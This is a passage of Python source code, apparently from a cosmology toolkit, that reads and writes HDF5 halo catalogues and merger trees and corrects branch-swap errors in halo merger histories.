snapsgrp=hdffile.create_group("Snapshots")
#internal tree keys
treekeys=["RootHead", "RootHeadSnap", "Head", "HeadSnap", "Tail", "TailSnap", "RootTail", "RootTailSnap", "Num_progen"]
for i in range(numsnaps):
#note that I normally have information in reverse order so that might be something in the units
snapgrp=snapsgrp.create_group("Snap_%03d"%(numsnaps-1-i))
snapgrp.attrs["Snapnum"]=i
snapgrp.attrs["NHalos"]=numhalos[i]
snapgrp.attrs["scalefactor"]=atime[i]
#now close file and use the pytables interface so as to write the table
hdffile.close()
#now write tables using pandas interface
for i in range(numsnaps):
#lets see if we can alter the code to write a table
keys=halodata[i].keys()
#remove tree keys
for tkey in treekeys: keys.remove(tkey)
#make temp dict
dictval=dict()
for key in keys:
dictval[key]=halodata[i][key]
#make a pandas DataFrame using halo dictionary
df=pd.DataFrame.from_dict(dictval)
df.to_hdf(fname+".snap.hdf.data","Snapshots/Snap_%03d/Halos"%(numsnaps-1-i), format='table', mode='a')
#reopen with h5py interface
hdffile=h5py.File(fname+".snap.hdf.data",'a')
#then write tree information in separate group
treegrp=hdffile.create_group("MergerTree")
#Tree group should contain
"""
HaloSnapID
HaloSnapNum
HaloSnapIndex
ProgenitorIndex
ProgenitorSnapnum
ProgenitorID
DescendantIndex
..
..
RootProgenitorIndex
..
..
RootDescendantIndex
"""
#to save on memory, allocate each block separately
#store halo information
tothalos=sum(numhalos)
tdata=np.zeros(tothalos,dtype=halodata[0]["ID"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["ID"]
count+=int(numhalos[i])
treegrp.create_dataset("HaloSnapID",data=tdata)
tdata=np.zeros(tothalos,dtype=np.uint32)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=i
count+=int(numhalos[i])
treegrp.create_dataset("HaloSnapNum",data=tdata)
tdata=np.zeros(tothalos,dtype=np.uint64)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=range(int(numhalos[i]))
count+=int(numhalos[i])
treegrp.create_dataset("HaloSnapIndex",data=tdata)
#store progenitors
tdata=np.zeros(tothalos,dtype=halodata[0]["Tail"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["Tail"]
count+=int(numhalos[i])
treegrp.create_dataset("ProgenitorID",data=tdata)
tdata=np.zeros(tothalos,dtype=halodata[0]["TailSnap"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["TailSnap"]
count+=int(numhalos[i])
treegrp.create_dataset("ProgenitorSnapnum",data=tdata)
tdata=np.zeros(tothalos,dtype=np.uint64)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=(halodata[i]["Tail"]%TEMPORALHALOIDVAL-1)
count+=int(numhalos[i])
treegrp.create_dataset("ProgenitorIndex",data=tdata)
#store descendants
tdata=np.zeros(tothalos,dtype=halodata[0]["Head"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["Head"]
count+=int(numhalos[i])
treegrp.create_dataset("DescendantID",data=tdata)
tdata=np.zeros(tothalos,dtype=halodata[0]["HeadSnap"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["HeadSnap"]
count+=int(numhalos[i])
treegrp.create_dataset("DescendantSnapnum",data=tdata)
tdata=np.zeros(tothalos,dtype=np.uint64)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=(halodata[i]["Head"]%TEMPORALHALOIDVAL-1)
count+=int(numhalos[i])
treegrp.create_dataset("DescendantIndex",data=tdata)
#store progenitors
tdata=np.zeros(tothalos,dtype=halodata[0]["RootTail"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["RootTail"]
count+=int(numhalos[i])
treegrp.create_dataset("RootProgenitorID",data=tdata)
tdata=np.zeros(tothalos,dtype=halodata[0]["RootTailSnap"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["RootTailSnap"]
count+=int(numhalos[i])
treegrp.create_dataset("RootProgenitorSnapnum",data=tdata)
tdata=np.zeros(tothalos,dtype=np.uint64)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=(halodata[i]["RootTail"]%TEMPORALHALOIDVAL-1)
count+=int(numhalos[i])
treegrp.create_dataset("RootProgenitorIndex",data=tdata)
#store descendants
tdata=np.zeros(tothalos,dtype=halodata[0]["RootHead"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["RootHead"]
count+=int(numhalos[i])
treegrp.create_dataset("RootDescendantID",data=tdata)
tdata=np.zeros(tothalos,dtype=halodata[0]["RootHeadSnap"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["RootHeadSnap"]
count+=int(numhalos[i])
treegrp.create_dataset("RootDescendantSnapnum",data=tdata)
tdata=np.zeros(tothalos,dtype=np.uint64)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=(halodata[i]["RootHead"]%TEMPORALHALOIDVAL-1)
count+=int(numhalos[i])
treegrp.create_dataset("RootDescendantIndex",data=tdata)
#store number of progenitors
tdata=np.zeros(tothalos,dtype=np.uint32)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["Num_progen"]
count+=int(numhalos[i])
treegrp.create_dataset("NProgen",data=tdata)
hdffile.close()
def ReadUnifiedTreeandHaloCatalog(fname, desiredfields=[], icombinedfile=1,iverbose=1):
    """
    Read Unified Tree and halo catalog from HDF file with base filename fname.

    Parameters
    ----------
    fname : string
        base filename; data is read from fname+".snap.hdf.data" (and the tree from
        fname+".tree.hdf.data") when icombinedfile is nonzero, otherwise from the
        per snapshot files fname+".snap_XXX.hdf.data"
    desiredfields : list
        if non-empty, only these halo property fields are loaded
    icombinedfile : int
        flag selecting a single combined file versus per snapshot files
    iverbose : int
        if 1, print progress information

    Returns
    -------
    atime,tree,numhalos,halodata,cosmodata,unitdata :
        scale factor per snapshot, tree dictionaries per snapshot, number of halos
        per snapshot, halo property dictionaries per snapshot, cosmology attributes
        and unit attributes (the latter two remain empty dicts on the per snapshot
        file path, which stores no such header groups)
    """
    #initialise cosmology/unit info up front so the per-snapshot-file path can
    #also return them (previously they were only assigned on the combined-file
    #path, giving a NameError at the other return)
    cosmodata=dict()
    unitdata=dict()
    if (icombinedfile):
        hdffile=h5py.File(fname+".snap.hdf.data",'r')
        #load data sets containing number of snaps
        headergrpname="Header/"
        numsnaps=hdffile[headergrpname].attrs["NSnaps"]
        #allocate memory
        halodata=[dict() for i in range(numsnaps)]
        numhalos=[0 for i in range(numsnaps)]
        atime=[0 for i in range(numsnaps)]
        tree=[[] for i in range(numsnaps)]
        #load cosmology data
        cosmogrpname="Cosmology/"
        fieldnames=[str(n) for n in hdffile[headergrpname+cosmogrpname].attrs.keys()]
        for fieldname in fieldnames:
            cosmodata[fieldname]=hdffile[headergrpname+cosmogrpname].attrs[fieldname]
        #load unit data
        unitgrpname="Units/"
        fieldnames=[str(n) for n in hdffile[headergrpname+unitgrpname].attrs.keys()]
        for fieldname in fieldnames:
            unitdata[fieldname]=hdffile[headergrpname+unitgrpname].attrs[fieldname]
        #for each snap load the appropriate group
        #use time.time() for wall-clock timing (time.clock() was removed in Python 3.8)
        start=time.time()
        for i in range(numsnaps):
            #NOTE(review): snapshot groups are addressed at the file root here while
            #the companion writer places them below a "Snapshots" group - confirm
            #against the writer used to produce the input file
            snapgrpname="Snap_%03d/"%(numsnaps-1-i)
            if (iverbose==1):
                print("Reading ",snapgrpname)
            isnap=hdffile[snapgrpname].attrs["Snapnum"]
            atime[isnap]=hdffile[snapgrpname].attrs["scalefactor"]
            numhalos[isnap]=hdffile[snapgrpname].attrs["NHalos"]
            if (len(desiredfields)>0):
                fieldnames=desiredfields
            else:
                fieldnames=[str(n) for n in hdffile[snapgrpname].keys()]
            for catvalue in fieldnames:
                halodata[isnap][catvalue]=np.array(hdffile[snapgrpname+catvalue])
        hdffile.close()
        print("read halo data ",time.time()-start)
    else :
        hdffile=h5py.File(fname+".snap_000.hdf.data",'r')
        numsnaps=int(hdffile["NSnaps"][0])
        #get field names
        fieldnames=[str(n) for n in hdffile.keys()]
        #clean of header info
        fieldnames.remove("Snapnum")
        fieldnames.remove("NSnaps")
        fieldnames.remove("NHalos")
        fieldnames.remove("TotalNHalos")
        fieldnames.remove("scalefactor")
        if (len(desiredfields)>0):
            fieldnames=desiredfields
        hdffile.close()
        halodata=[[] for i in range(numsnaps)]
        numhalos=[0 for i in range(numsnaps)]
        atime=[0 for i in range(numsnaps)]
        tree=[[] for i in range(numsnaps)]
        start=time.time()
        for i in range(numsnaps):
            hdffile=h5py.File(fname+".snap_%03d.hdf.data"%(numsnaps-1-i),'r')
            atime[i]=(hdffile["scalefactor"])[0]
            numhalos[i]=(hdffile["NHalos"])[0]
            halodata[i]=dict()
            for catvalue in fieldnames:
                halodata[i][catvalue]=np.array(hdffile[catvalue])
            hdffile.close()
        print("read halo data ",time.time()-start)
        #the tree file is ignored on this path; return empty tree dicts
        for i in range(numsnaps):
            tree[i]=dict()
        return atime,tree,numhalos,halodata,cosmodata,unitdata
    #combined file path: read the walkable tree information from the companion tree file
    hdffile=h5py.File(fname+".tree.hdf.data",'r')
    treefields=["haloID", "Num_progen"]
    #to be completed for Progenitor list although information is contained in the
    #halo catalog by searching for things with the same head
    for i in range(numsnaps):
        snapgrpname="Snap_%03d/"%(numsnaps-1-i)
        tree[i]=dict()
        for catvalue in treefields:
            tree[i][catvalue]=np.array(hdffile[snapgrpname+catvalue])
    hdffile.close()
    return atime,tree,numhalos,halodata,cosmodata,unitdata
def ProduceWalkableHDFTree(fname,numsnaps,tree,numhalos,halodata,atime,
    descripdata={'Title':'Tree catalogue', 'VELOCIraptor_version':1.3, 'Tree_version':1.1, 'Particle_num_threshold':20, 'Temporal_linking_length':1, 'Flag_gas':False, 'Flag_star':False, 'Flag_bh':False}
    ):
    """
    Produces a HDF5 formatted file containing Reduced Walkable Tree information,
    ie; RootHead, Head, HeadSnap, Tail, RootTail, etc.

    Parameters
    ----------
    fname : string
        filename of the hdf file to be written
    numsnaps : int
        the number of snapshots
    tree : dict
        the tree data
    numhalos : array
        array of number of halos per snapshot
    halodata : dict
        the halo data dictionary
    atime : array
        array of scalefactors/times of the snapshots
    descripdata : dict
        stores a description of how the tree catalogue was produced

    Returns
    -------
    void :
        Only writes an hdf file. Nothing is returned.
    """
    #per-halo datasets that make the tree walkable
    halokeys=["RootHead", "RootHeadSnap", "Head", "HeadSnap", "Tail", "TailSnap", "RootTail", "RootTailSnap", "ID", "Num_progen"]
    hdffile=h5py.File(fname,'w')
    #header records the snapshot count, a title and the provenance of the halo
    #finder and tree builder that produced the catalogue
    headergrp=hdffile.create_group("Header")
    headergrp.attrs["NSnaps"]=numsnaps
    headergrp.attrs["Title"]=descripdata["Title"]
    findergrp=headergrp.create_group("HaloFinder")
    for attrname,attrvalue in [("Name","VELOCIraptor"),("Version",descripdata["VELOCIraptor_version"]),("Particle_num_threshold",descripdata["Particle_num_threshold"])]:
        findergrp.attrs[attrname]=attrvalue
    treebuildergrp=headergrp.create_group("TreeBuilder")
    for attrname,attrvalue in [("Name","VELOCIraptor-Tree"),("Version",descripdata["Tree_version"]),("Temporal_linking_length",descripdata["Temporal_linking_length"])]:
        treebuildergrp.attrs[attrname]=attrvalue
    #one group per snapshot holding the walkable-tree datasets
    snapsgrp=hdffile.create_group("Snapshots")
    for snapnum in range(numsnaps):
        snapgrp=snapsgrp.create_group("Snap_%03d"%snapnum)
        snapgrp.attrs["Snapnum"]=snapnum
        snapgrp.attrs["NHalos"]=numhalos[snapnum]
        snapgrp.attrs["scalefactor"]=atime[snapnum]
        for halokey in halokeys:
            snapgrp.create_dataset(halokey,data=halodata[snapnum][halokey])
    hdffile.close()
def ReadWalkableHDFTree(fname, iverbose=True):
    """
    Reads a simple walkable hdf tree file.

    Assumes the input has per-snapshot datasets
    ["RootHead", "RootHeadSnap", "Head", "HeadSnap", "Tail", "TailSnap", "RootTail", "RootTailSnap", "ID", "Num_progen"]
    along with attributes per snap of the scale factor (eventually must generalize to time as well)
    and a header group with attributes like number of snapshots.

    Parameters
    ----------
    fname : string
        filename of the walkable hdf tree file
    iverbose : bool
        if True, print progress information

    Returns
    -------
    halodata,numsnaps,nsnapsearch :
        the halo IDs with walkable tree data per snapshot, the number of snaps,
        and the number of snapshots searched when building the tree
    """
    hdffile=h5py.File(fname,'r')
    numsnaps=hdffile['Header'].attrs["NSnaps"]
    #bug fix: the attribute lives on the TreeBuilder group of the open file;
    #previously the file handle was missing so a bare list literal was indexed
    nsnapsearch=hdffile["Header/TreeBuilder"].attrs["Temporal_linking_length"]
    if (iverbose): print("number of snaps",numsnaps)
    halodata=[dict() for i in range(numsnaps)]
    for i in range(numsnaps):
        #note that I normally have information in reverse order so that might be something in the units
        if (iverbose): print("snap ",i)
        for key in hdffile['Snapshots']['Snap_%03d'%i].keys():
            halodata[i][key]=np.array(hdffile['Snapshots']['Snap_%03d'%i][key])
    hdffile.close()
    return halodata,numsnaps,nsnapsearch
def FixTruncationBranchSwapsInTreeDescendant(rawtreefname,reducedtreename,snapproplistfname,outputupdatedreducedtreename,
    descripdata={'Title':'Tree catalogue', 'VELOCIraptor_version':1.3, 'Tree_version':1.1, 'Particle_num_threshold':20, 'Temporal_linking_length':1, 'Flag_gas':False, 'Flag_star':False, 'Flag_bh':False},
    npartlim=200,meritlim=0.025,xdifflim=2.0,vdifflim=1.0,snapsearch=4,
    TEMPORALHALOIDVAL=1000000000000,
    ibuildtree=False,inputtreeformat=2,inputpropformat=2,inputpropsplitformat=0):
    """
    Updates a tree produced by TreeFrog to correct any branch swap events leading to truncation
    that requires full roothead/root tail information to correctly fix.

    Parameters
    ----------
    rawtreefname : string
        file name of the raw TreeFrog descendant tree
    reducedtreename : string
        file name of the walkable HDF tree (used when ibuildtree is False)
    snapproplistfname : string
        file listing, one line per snapshot, the property file of each snapshot
    outputupdatedreducedtreename : string
        name of the updated walkable tree written at the end (a .branchfix.log is also produced)
    descripdata : dict
        description of how the tree catalogue was produced
    npartlim,meritlim,xdifflim,vdifflim,snapsearch :
        particle number, merit and phase-space limits plus the snapshot search
        window used to identify and accept candidate branch fixes
    TEMPORALHALOIDVAL : int
        value used to encode the snapshot number in temporal halo IDs
    ibuildtree,inputtreeformat,inputpropformat,inputpropsplitformat :
        input handling flags and formats

    Returns
    -------
    rawtreedata,halodata,numhalos,atime :
        the raw tree, the corrected halo data, halo counts per snap and scale factors
    """
    #raw descendant tree; assumed to carry per-halo 'Descen', 'Merit' and 'Rank'
    #lists (the original referenced an undefined name "treedata" below - TODO confirm)
    rawtreedata=ReadHaloMergerTreeDescendant(rawtreefname,False,inputtreeformat,0,True)
    #and also extract the description used to make the tree
    numsnaps=len(rawtreedata)
    if (ibuildtree):
        #bug fix: allocate the halodata the head/tail builder fills in
        #(was previously assigned to the unused name "halo")
        halodata=[dict() for i in range(numsnaps)]
        numhalos=np.zeros(numsnaps,dtype=np.uint64)
        BuildTemporalHeadTailDescendant(numsnaps,rawtreedata,numhalos,halodata,TEMPORALHALOIDVAL)
    else:
        #bug fix: ReadWalkableHDFTree returns (halodata,numsnaps,nsnapsearch); unpack it
        halodata,numsnaps,nsnapsearch=ReadWalkableHDFTree(reducedtreename)
    proplist=['npart','hostHaloID','Structuretype','ID','Xc','Yc','Zc','VXc','VYc','VZc','Rmax','Vmax','R_200crit']
    numhalos=np.zeros(numsnaps,dtype=np.uint64)
    snaplist=open(snapproplistfname,'r')
    for i in range(numsnaps):
        snapfile=snaplist.readline().strip()
        halotemp,numhalos[i]=ReadPropertyFile(snapfile,inputpropformat,inputpropsplitformat,0,proplist)
        halodata[i].update(halotemp)
    #close the snapshot list (previously leaked)
    snaplist.close()
    #strip off simulation info and unit info
    SimulationInfo=copy.deepcopy(halodata[0]['SimulationInfo'])
    #bug fix: copy the unit information (was a second deep copy of SimulationInfo)
    UnitInfo=copy.deepcopy(halodata[0]['UnitInfo'])
    #bug fix: the period comes from the SimulationInfo dict (was indexing a bare list literal)
    period=SimulationInfo['Period']
    #convert positions and sizes to comoving if necessary
    if (UnitInfo['Comoving_or_Physical']==0 and SimulationInfo['Cosmological_Sim']==1):
        converttocomove=['Xc','Yc','Zc','Rmax','R_200crit']
        for i in range(numsnaps):
            for key in converttocomove:
                halodata[i][key]/=halodata[i]['SimulationInfo']['ScaleFactor']
        #extracted period from first snap so can use the scale factor stored in simulation info
        period/=SimulationInfo['ScaleFactor']
    atime=np.zeros(numsnaps)
    numhalos=np.zeros(numsnaps,dtype=np.int64)
    for i in range(numsnaps):
        atime[i]=halodata[i]['SimulationInfo']['ScaleFactor']
        numhalos[i]=len(halodata[i]['Xc'])
    f1=open(outputupdatedreducedtreename+'.branchfix.log','w')
    #note: all temporal halo ID decoding below uses the TEMPORALHALOIDVAL argument
    #(the original referenced an undefined HALOIDVAL)
    for i in range(numsnaps-1):
        #find halos with no progenitors that are large enough and continue to exist for several snapshots
        if(numhalos[i]==0): continue
        noprog=np.where((halodata[i]['Tail']==halodata[i]['ID'])*(halodata[i]['npart']>=npartlim)*(halodata[i]['Head']!=halodata[i]['ID']))
        if (len(noprog[0])==0):continue
        #have object(s) with no progenitor
        for inoprog in noprog[0]:
            haloID=halodata[i]['ID'][inoprog]
            haloSnap=np.uint64(haloID/TEMPORALHALOIDVAL)
            haloIndex=np.uint64(haloID%TEMPORALHALOIDVAL-1)
            haloRootHeadID=halodata[i]['RootHead'][inoprog]
            #if object doesn't have a main branch that persists for at least 1 snapshot, skip
            if (halodata[np.uint32(halodata[i]['Head'][inoprog]/TEMPORALHALOIDVAL)]['Tail'][np.uint64(halodata[i]['Head'][inoprog]%TEMPORALHALOIDVAL-1)]!=haloID): continue
            #get host halo
            haloHost=halodata[haloSnap]['hostHaloID'][haloIndex]
            if (haloHost==-1): haloHost=halodata[haloSnap]['ID'][haloIndex]
            print('halo with no progenitor', haloID,halodata[i]['npart'][inoprog],halodata[i]['Structuretype'][inoprog],
                haloHost,halodata[i]['Head'][inoprog],
                halodata[np.uint32(halodata[i]['Head'][inoprog]/TEMPORALHALOIDVAL)]['Tail'][np.uint64(halodata[i]['Head'][inoprog]%TEMPORALHALOIDVAL-1)],
                file=f1)
            #first lets see if any halos previous to this point within a snapsearch radius
            #point to halo with no progenitor as a high merit, 1 rank connection.
            searchrange=max(0,i-snapsearch)
            mergeHalo=-1
            mergeMerit=-1
            for isearch in range(searchrange,i):
                #current candidates pointing to same root head
                candidates=np.where((halodata[isearch]['RootHead']==haloRootHeadID)*(halodata[isearch]['npart']>=meritlim*halodata[i]['npart'][inoprog]))
                if (len(candidates[0])==0): continue
                for ican in candidates[0]:
                    matches=np.where((rawtreedata[isearch]['Descen'][ican]==haloID)*(rawtreedata[isearch]['Merit'][ican]>=meritlim)*(rawtreedata[isearch]['Rank'][ican]==1))
                    if (len(matches[0])==0): continue
                    #have a useful match for where object may have come from!
                    #choose highest merit
                    if (rawtreedata[isearch]['Merit'][ican][matches[0][0]]>mergeMerit):
                        mergeHalo=halodata[isearch]['ID'][ican]
                        mergeMerit=rawtreedata[isearch]['Merit'][ican][matches[0][0]]
                if (mergeHalo!=-1): break
            #if found nothing, can't fix
            if (mergeHalo==-1): continue
            #if merge halo is not a zero rank progenitor of anything, can't fix
            mergeSnap=np.uint64(mergeHalo/TEMPORALHALOIDVAL)
            mergeIndex=np.uint64(mergeHalo%TEMPORALHALOIDVAL-1)
            if (rawtreedata[mergeSnap]['Rank'][mergeIndex][0]!=0): continue
            print(haloID, 'may have found merge halo',mergeHalo, rawtreedata[mergeSnap]['Descen'][mergeIndex], rawtreedata[mergeSnap]['Merit'][mergeIndex],rawtreedata[mergeSnap]['Rank'][mergeIndex],file=f1)
            #have candidate object that points to both object with no progenitor and object with progenitor
            #store post merge
            postmergeHalo=halodata[mergeSnap]['Head'][mergeIndex]
            postmergeSnap=np.uint64(postmergeHalo/TEMPORALHALOIDVAL)
            postmergeIndex=np.uint64(postmergeHalo%TEMPORALHALOIDVAL-1)
            #store the progenitor of the halo where likely something has merged
            premergeHalo=halodata[mergeSnap]['Tail'][mergeIndex]
            premergeSnap=np.uint64(premergeHalo/TEMPORALHALOIDVAL)
            premergeIndex=np.uint64(premergeHalo%TEMPORALHALOIDVAL-1)
            #get the merge object's pre/cur/post host halos
            mergeHost=halodata[mergeSnap]['hostHaloID'][mergeIndex]
            if (mergeHost==-1): mergeHost=halodata[mergeSnap]['ID'][mergeIndex]
            postmergeHost=halodata[postmergeSnap]['hostHaloID'][postmergeIndex]
            if (postmergeHost==-1): postmergeHost=halodata[postmergeSnap]['ID'][postmergeIndex]
            premergeHost=halodata[premergeSnap]['hostHaloID'][premergeIndex]
            if (premergeHost==-1): premergeHost=halodata[premergeSnap]['ID'][premergeIndex]
            #now lets look backwards and see if we can find an object that might be the progenitor.
            #lets stick to the host halo mergeHost halo line
            branchfixHalo=-1
            minxdiff=minvdiff=minphase2diff=1e32
            curHalo=premergeHalo
            curSnap=np.uint64(curHalo/TEMPORALHALOIDVAL)
            curIndex=np.uint64(curHalo%TEMPORALHALOIDVAL-1)
            searchrange=max(0,curSnap-snapsearch)
            while(curSnap>=searchrange and halodata[curSnap]['Tail'][curIndex]!=curHalo):
                curHost=halodata[curSnap]['hostHaloID'][curIndex]
                if (curHost==-1): curHost=halodata[curSnap]['ID'][curIndex]
                curHostSnap=np.uint64(curHost/TEMPORALHALOIDVAL)
                curHostIndex=np.uint64(curHost%TEMPORALHALOIDVAL-1)
                #search for objects that end up at the same root head and have npart enough to warrant
                #searching their positions
                candidates=np.where((halodata[curHostSnap]['RootHead']==haloRootHeadID)*(halodata[curHostSnap]['npart']>=meritlim*halodata[mergeSnap]['npart'][mergeIndex])*(halodata[curHostSnap]['Head']!=mergeHalo))[0]
                #if no candidates exist, move back again
                if (len(candidates)==0):
                    curHalo=halodata[curHostSnap]['Tail'][curHostIndex]
                    curSnap=np.uint64(curHalo/TEMPORALHALOIDVAL)
                    curIndex=np.uint64(curHalo%TEMPORALHALOIDVAL-1)
                    continue
                #look at candidates
                for icandidate in candidates:
                    #if object points to a halo at the post merge snap then has match at this point, keep looking
                    if (np.uint32(halodata[curHostSnap]['Head'][icandidate]/TEMPORALHALOIDVAL)<=haloSnap): continue
                    #if object is not the primary descendant do nothing
                    if (rawtreedata[curHostSnap]['Rank'][icandidate][0]!=0): continue
                    #check its position and velocity relative to the post merge halo,
                    #wrapping positions by the periodic box
                    xrel=np.array([halodata[curHostSnap]['Xc'][icandidate]-halodata[postmergeSnap]['Xc'][postmergeIndex],halodata[curHostSnap]['Yc'][icandidate]-halodata[postmergeSnap]['Yc'][postmergeIndex],halodata[curHostSnap]['Zc'][icandidate]-halodata[postmergeSnap]['Zc'][postmergeIndex]])
                    xrel[np.where(xrel>0.5*period)]-=period
                    xrel[np.where(xrel<-0.5*period)]+=period
                    xdiff=np.linalg.norm(xrel)/halodata[postmergeSnap]['Rmax'][postmergeIndex]
                    vdiff=np.linalg.norm(np.array([halodata[curHostSnap]['VXc'][icandidate]-halodata[postmergeSnap]['VXc'][postmergeIndex],halodata[curHostSnap]['VYc'][icandidate]-halodata[postmergeSnap]['VYc'][postmergeIndex],halodata[curHostSnap]['VZc'][icandidate]-halodata[postmergeSnap]['VZc'][postmergeIndex]]))/halodata[postmergeSnap]['Vmax'][postmergeIndex]
                    #object must have vdiff < limit and xdiff less than limit to proceed
                    if not (xdiff<xdifflim and vdiff<vdifflim): continue
                    #calculate the phase-difference, min phase-difference should correspond to candidate progenitor to postmerge line
                    phase2diff=xdiff**2.0+vdiff**2.0
                    if (phase2diff<minphase2diff):
                        minphase2diff=phase2diff
                        minxdiff=xdiff
                        minvdiff=vdiff
                        branchfixHalo=halodata[curHostSnap]['ID'][icandidate]
                curHalo=halodata[curHostSnap]['Tail'][curHostIndex]
                curSnap=np.uint64(curHalo/TEMPORALHALOIDVAL)
                curIndex=np.uint64(curHalo%TEMPORALHALOIDVAL-1)
            if (branchfixHalo==-1): continue
            branchfixSnap=np.uint64(branchfixHalo/TEMPORALHALOIDVAL)
            branchfixIndex=np.uint64(branchfixHalo%TEMPORALHALOIDVAL-1)
            branchfixHead=halodata[branchfixSnap]['Head'][branchfixIndex]
            branchfixHeadSnap=np.uint64(branchfixHead/TEMPORALHALOIDVAL)
            branchfixHeadIndex=np.uint64(branchfixHead%TEMPORALHALOIDVAL-1)
            print('halo branch swap occurs at ',haloID, 'now should have progenitor', mergeHalo, 'with ',branchfixHalo,' taking over ',postmergeHalo,minxdiff,minvdiff,file=f1)
            #now adjust these points, mergeHalo must have its Head changed,
            #haloID must have tail and RootTail and all its descendants that share the same root tail updated
            #branchfixHalo must have its head changed and all its descendants that share the same root tail updated
            #postmergeHalo must now point to branchfixHalo and update head/tail and also now will point to Head of branchfixHalo
            newroottail=halodata[mergeSnap]['RootTail'][mergeIndex]
            newroottailbranchfix=halodata[branchfixSnap]['RootTail'][branchfixIndex]
            newroottailSnap=halodata[mergeSnap]['RootTailSnap'][mergeIndex]
            newroottailbranchfixSnap=halodata[branchfixSnap]['RootTailSnap'][branchfixIndex]
            oldroottail=halodata[postmergeSnap]['RootTail'][postmergeIndex]
            print('new tails will be ',newroottail,newroottailbranchfix,file=f1)
            #adjust head tails of object with no progenitor
            print('before fix merge',mergeHalo,halodata[mergeSnap]['Head'][mergeIndex],'no prog',haloID,halodata[haloSnap]['Tail'][haloIndex],file=f1)
            halodata[mergeSnap]['Head'][mergeIndex]=haloID
            halodata[mergeSnap]['HeadSnap'][mergeIndex]=haloSnap
            halodata[haloSnap]['Tail'][haloIndex]=mergeHalo
            halodata[haloSnap]['TailSnap'][haloIndex]=mergeSnap
            #adjust head tails of branch swap line
            print('before fix branch fix',branchfixHalo,halodata[branchfixSnap]['Head'][branchfixIndex],' post merge',postmergeHalo,halodata[postmergeSnap]['Tail'][postmergeIndex],file=f1)
            halodata[branchfixSnap]['Head'][branchfixIndex]=postmergeHalo
            halodata[branchfixSnap]['HeadSnap'][branchfixIndex]=postmergeSnap
            halodata[postmergeSnap]['Tail'][postmergeIndex]=branchfixHalo
            halodata[postmergeSnap]['TailSnap'][postmergeIndex]=branchfixSnap
            halodata[postmergeSnap]['Head'][postmergeIndex]=branchfixHead
            halodata[postmergeSnap]['HeadSnap'][postmergeIndex]=branchfixHeadSnap
            halodata[branchfixHeadSnap]['Tail'][branchfixHeadIndex]=postmergeHalo
            halodata[branchfixHeadSnap]['TailSnap'][branchfixHeadIndex]=postmergeSnap
            #update the root tails along the newly joined branch
            curHalo=haloID
            curSnap=np.uint64(curHalo/TEMPORALHALOIDVAL)
            curIndex=np.uint64(curHalo%TEMPORALHALOIDVAL-1)
            while (True):
                print('moving up branch to adjust the root tails',curHalo,curSnap,halodata[curSnap]['RootTail'][curIndex],newroottail,file=f1)
                halodata[curSnap]['RootTail'][curIndex]=newroottail
                halodata[curSnap]['RootTailSnap'][curIndex]=newroottailSnap
                #if not on main branch exit
                if (halodata[np.uint32(halodata[curSnap]['Head'][curIndex]/TEMPORALHALOIDVAL)]['Tail'][np.uint64(halodata[curSnap]['Head'][curIndex]%TEMPORALHALOIDVAL-1)]!=curHalo): break
                #if at root head then exit
                if (halodata[curSnap]['Head'][curIndex]==curHalo): break
                curHalo=halodata[curSnap]['Head'][curIndex]
                curSnap=np.uint64(curHalo/TEMPORALHALOIDVAL)
                curIndex=np.uint64(curHalo%TEMPORALHALOIDVAL-1)
            #and along the fixed branch
            curHalo=postmergeHalo
            curSnap=np.uint64(curHalo/TEMPORALHALOIDVAL)
            curIndex=np.uint64(curHalo%TEMPORALHALOIDVAL-1)
            while (True):
                print('moving up fix branch to adjust the root tails',curHalo,curSnap,halodata[curSnap]['RootTail'][curIndex],newroottailbranchfix,file=f1)
                halodata[curSnap]['RootTail'][curIndex]=newroottailbranchfix
                halodata[curSnap]['RootTailSnap'][curIndex]=newroottailbranchfixSnap
                #if not on main branch exit
                if (halodata[np.uint32(halodata[curSnap]['Head'][curIndex]/TEMPORALHALOIDVAL)]['Tail'][np.uint64(halodata[curSnap]['Head'][curIndex]%TEMPORALHALOIDVAL-1)]!=curHalo): break
                #if at root head then exit
                if (halodata[curSnap]['Head'][curIndex]==curHalo): break
                curHalo=halodata[curSnap]['Head'][curIndex]
                curSnap=np.uint64(curHalo/TEMPORALHALOIDVAL)
                curIndex=np.uint64(curHalo%TEMPORALHALOIDVAL-1)
    f1.close()
    ProduceWalkableHDFTree(outputupdatedreducedtreename,numsnaps,rawtreedata,numhalos,halodata,atime,descripdata)
    return rawtreedata,halodata,numhalos,atime
"""
Conversion Tools
"""
def _ConvertASCIIPropertyFileToHDFSingle(filename,hdffilename,fieldnames,iverbose):
    """
    Convert one ASCII VELOCIraptor .properties file into its HDF5 equivalent.
    Writes the header datasets, then one typed dataset per property column.
    """
    if (iverbose) : print("reading ",filename)
    halofile = open(filename, 'r')
    hdffile=h5py.File(hdffilename,'w')
    [filenum,numfiles]=halofile.readline().split()
    [numhalos, numtothalos]= halofile.readline().split()
    filenum=int(filenum);numfiles=int(numfiles)
    numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
    #write header info
    hdffile.create_dataset("File_id",data=np.array([filenum]))
    hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
    hdffile.create_dataset("Num_of_groups",data=np.array([numhalos]))
    hdffile.create_dataset("Total_num_of_groups",data=np.array([numtothalos]))
    halofile.close()
    #skip the 3 header lines and read all halo property columns
